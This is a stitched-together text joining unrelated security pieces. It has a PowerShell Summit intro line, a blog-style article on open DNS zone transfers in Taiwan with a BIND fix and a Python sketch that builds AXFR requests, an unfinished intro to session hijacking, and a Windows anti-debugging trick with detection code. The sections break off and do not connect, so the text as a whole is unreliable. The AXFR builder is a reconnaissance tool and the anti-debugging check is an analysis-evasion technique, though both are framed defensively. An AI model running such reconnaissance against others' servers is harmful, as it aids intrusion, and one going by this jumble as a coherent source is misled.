As a security professional, attending the PowerShell Summit is a great opportunity for me to meet and mingle with those outside of the security field as it forces me to get out of my security bubble and gain a completely different perspective from a wide range of IT pros and developers who are using PowerShell for completely non-malicious purposes ;)! Not to mention, getting to pick the brains of Microsoft employees like Jeffrey Snover, Lee Holmes, Jason Shirk, and Joe Bialek is humbling to say the least.
DNS was invented by Paul Mockapetris in 1983 and is specified in RFC 1034 and RFC 1035. Its main job is to keep track of the mapping between IP addresses and names, so that people can remember hostnames in a simpler form. Most ordinary users today rely on DNS servers run by their ISP or by well-known companies, such as Chunghwa Telecom's 168.95.1.1 or Google's 8.8.8.8.
Enterprises, however, may need to run large numbers of machines and internal systems while keeping hostnames easy to remember, so many of them operate their own DNS servers. They usually also set up several backup DNS servers so that DNS service is not suddenly interrupted. With multiple DNS servers, the records must be kept synchronized, which is normally done with the zone transfer feature.
But if administrators fail to configure this properly, so that any source may issue zone transfer queries against the company's DNS servers, the feature can become the starting point of an attack. As a real-life analogy, an open zone transfer is like letting anyone look up the location of every property you own: someone planning a targeted attack can check each of your properties at leisure for an unlocked door or window and wait for the chance to break in. When we run penetration tests against corporate systems, the information-gathering phase likewise starts from domain names, which shows how valuable DNS data is.
The security implications of zone transfer were raised as early as 1999, and checking for it ought to be a standard step in every security audit. Yet fifteen years on, we recently found that many large domestic enterprises still have this problem, which is astonishing! How can an enterprise test whether it is exposed? How widespread is the problem in Taiwan's network environment today? What impact can zone transfer have on an enterprise? Read on~
As in our earlier article on HTTP header security, we looked at TIEA members and the Alexa TW top 525 to see what share of each group has the zone transfer problem.
According to our measurements, 20 of TIEA's current 132 member domains have the zone transfer problem, or 15.15%, while 48 domains in the Alexa TW top 525 do, or 9.14%. At first glance those rates may not seem high, but the affected domains in these two groups include:
Telecom carriers
Several TV media outlets
Several online news outlets
Several online shopping sites
A well-known group-buying site
A well-known payment-processing company
A well-known online music service
That Taiwanese companies pay too little attention to information security and neglect the safety of customer data is old news. When a company disregards its own commercial interests and obligations, and we have no business dealings with it, we cannot hold it to account one case at a time. But when the Taipei City Government, the Ministry of Education, and several universities have the same problem, that is much harder to accept: these government agencies and educational institutions ought to bear full responsibility for the security of our personal data and should not miss a single link in the security chain. The results above suggest that, from government to industry, Taiwan may not have thoroughly implemented secure DNS configuration. And these figures cover only TIEA members and the Alexa TW top 525; a broad scan of all of Taiwan, or of the whole world, would likely turn up even more alarming cases!
Potential impact on enterprises
Leaking domain names
When an enterprise commissions a penetration test, it usually picks only a few of its most important, most customer-facing domains, but intruders are not so polite. Anyone trying to break into an enterprise will first carry out thorough reconnaissance, looking for domains running services with potential weaknesses, or domains with weaker defenses, and start there. The complete DNS records exposed by the zone transfer problem therefore save an intruder a great deal of reconnaissance work.
Leaking external IP ranges
Once an attacker obtains the data leaked by a zone transfer, they can reasonably infer which network ranges belong to the enterprise and go on to scan those ranges for promising targets.
Leaking internal IP ranges
For convenience during internal development, administrators and developers often bind domain names to internal IP addresses, e.g. pointing phpmyadmin.example.com at 192.168.1.100, which lets an attacker guess which internal segments host important services. Such a setup may normally cause no serious harm, but when administrators neglect internal defenses and the enterprise happens to be breached all the way into the intranet, the odds of a chain of major losses rise sharply.
Mitigation
Linux
On Linux, you can add the following option to /etc/named.conf to restrict the sources allowed to request zone transfers:
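With BIND, for instance, the option in question is allow-transfer (a sketch; replace 192.0.2.2 with the address of your own secondary name server):

```
options {
    // permit zone transfers only from our secondary name server
    allow-transfer { 192.0.2.2; };
};
```

allow-transfer can also be set per zone, and transfers can additionally be authenticated with TSIG keys.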
Zone transfers run over TCP port 53 (unlike ordinary DNS queries, which use UDP port 53), so some people figure that simply closing TCP port 53 deals with zone transfers and that the zone transfer settings need not be touched. That idea is only half right: if the zone file's data is smaller than 512 bytes, it can still be carried over UDP, and even when it is larger than 512 bytes, an Incremental Zone Transfer (IXFR) can be used to obtain part of the data.
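To see why blocking the port alone is not a complete fix, it helps to look at what a zone transfer request actually is: an ordinary DNS query whose QTYPE is 252 (AXFR), carried over TCP with a two-byte length prefix. A minimal sketch in Python (not from the original article; the zone name and transaction ID are arbitrary):

```python
# Build the wire form of a DNS AXFR request (RFC 1035 message format).
import struct

def dns_axfr_query(zone, txid=0x1234):
    """Build a TCP-framed DNS query asking for a full zone transfer."""
    header = struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0)  # 1 question, no flags
    qname = b"".join(
        bytes([len(label)]) + label.encode("ascii")
        for label in zone.rstrip(".").split(".")
    ) + b"\x00"
    question = qname + struct.pack(">HH", 252, 1)  # QTYPE=AXFR, QCLASS=IN
    msg = header + question
    # DNS over TCP prefixes every message with its two-byte length.
    return struct.pack(">H", len(msg)) + msg

wire = dns_axfr_query("example.com")
print(len(wire))  # 31 bytes for this zone name
```

Sending these bytes to an open name server's TCP port 53 is all it takes to request the whole zone, which is why the server-side allow-transfer restriction, not port filtering, is the real fix.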
Conclusion
If an enterprise is truly confident that it has complete security measures in place for every one of its domains, then the data leaked by zone transfers will do it no serious harm. But in a world where intrusion techniques evolve by the day, who can guarantee forever that their defenses are sufficient? After the recent high-profile OpenSSL CVE-2014-0160 Heartbleed bug came to light, zone transfer records let us observe that a great many enterprises worldwide fixed the OpenSSL vulnerability only on their main websites, overlooking other services and devices that might share it, such as databases, email, VPN, and NAS, and many remain unpatched to this day.
Here is an analogy. You join a secret club: after filling in a membership form you receive a membership card, and from then on the card alone gets you in. The next day, you lose the card. Whoever picks it up can now enter the secret club as you, because the card carries no photo or other identifying information. A membership website works the same way: we register an account (fill in the form and join the club), log in with our username and password, and receive a cookie containing a session ID that identifies us (the card that identifies a member). If the cookie is stolen (the card is picked up), someone else can log in to the site under our account (enter the club with our card).
There are three kinds of session attacks:
Session Prediction (guessing the session ID)
Session Hijacking (stealing the session ID)
Session Fixation (fixing the session ID)
We will introduce each of them in turn.
Session Prediction (Guessing the Session ID)
As we said above, a session ID is like a membership card number: whoever knows the session ID becomes that user. If session IDs lack sufficient length, complexity, and randomness, an attacker can guess them. By writing a program that brute-forces candidate session IDs, an attacker stands a chance of hitting a valid one and taking over the user's account.
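The point about length and randomness can be made concrete with a small sketch (the ID formats here are invented for illustration, not any real site's scheme):

```python
# Contrast a predictable session ID scheme with one drawn from the OS CSPRNG.
import secrets

def weak_session_id(counter):
    # Sequential IDs: seeing one tells you all of its neighbours.
    return "SESS%08d" % counter

def strong_session_id():
    # 32 random bytes, about 256 bits of entropy: infeasible to brute-force.
    return secrets.token_hex(32)

print(weak_session_id(41), weak_session_id(42))  # adjacent, trivially guessable
print(len(strong_session_id()))                  # 64 hex characters
```

A server issuing IDs like the first function's is exactly the situation described above: an attacker who observes one ID can enumerate its neighbours and hijack other users' sessions.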
In this post I will share with you an anti-debugging trick that is very similar to the "PAGE_EXECUTE_WRITECOPY" trick mentioned here, where we had to mark the code section as writable so that any memory write to its page(s) would force the OS to change the page protection from PAGE_EXECUTE_WRITECOPY to PAGE_EXECUTE_READWRITE. In this case, however, we don't have to modify the code section's page protection at all; we simply query the process for its current working set information. Among the data returned when querying a process's working set are two fields, "Shared" and "ShareCount".
By default the OS assumes that the memory pages of the code section (and other non-writable sections) can share physical memory across all instances of the process. This holds until one process instance performs a memory write to a shared page, at which point the page is no longer shared. Thus, querying the process's working set and inspecting the "Shared" and/or "ShareCount" fields for our code section's pages can reveal the presence of a debugger, but only if the debugger uses INT3 for breakpoints, since patching the 0xCC breakpoint byte into a code page is exactly the kind of write that triggers copy-on-write and un-shares the page.
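As a rough sketch of the idea (this is not the author's linked code): on Windows, the documented psapi!QueryWorkingSetEx API exposes the same per-page Valid/ShareCount/Shared attributes. The bit layout below follows the documented PSAPI_WORKING_SET_EX_BLOCK; on non-Windows systems the function simply returns None.

```python
# Probe whether a code page has lost its shared status (copy-on-write fired),
# which on Windows can indicate an INT3 breakpoint patched into it.
import ctypes
import sys

class WsExInfo(ctypes.Structure):
    # PSAPI_WORKING_SET_EX_INFORMATION: an address plus packed attribute bits
    _fields_ = [("VirtualAddress", ctypes.c_void_p),
                ("VirtualAttributes", ctypes.c_size_t)]

def int3_breakpoint_suspected(addr):
    """True if the page holding addr is valid but no longer shared,
    i.e. something (such as an INT3 0xCC patch) wrote to it."""
    if sys.platform != "win32":
        return None  # Windows-only technique
    psapi = ctypes.WinDLL("psapi")
    kernel32 = ctypes.WinDLL("kernel32")
    kernel32.GetCurrentProcess.restype = ctypes.c_void_p
    psapi.QueryWorkingSetEx.argtypes = [ctypes.c_void_p, ctypes.c_void_p,
                                        ctypes.c_ulong]
    info = WsExInfo(ctypes.c_void_p(addr & ~0xFFF), 0)
    if not psapi.QueryWorkingSetEx(kernel32.GetCurrentProcess(),
                                   ctypes.byref(info), ctypes.sizeof(info)):
        return None
    attrs = info.VirtualAttributes
    valid = attrs & 1            # bit 0: page is in the working set
    shared = (attrs >> 15) & 1   # bit 15: page still shared across processes
    return bool(valid) and not shared

print(int3_breakpoint_suspected(0x400000))
```

In a real check you would walk every page of the module's code section rather than probe a single hard-coded address.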
N.B. You can also use the "ZwQueryVirtualMemory" function with the "MemoryInformationClass" parameter set to MemoryWorkingSetList for more portable code.
Code from here and demo from here. Tested on Windows 7.
For any suggestions, leave me a comment or drop me a mail at [email protected].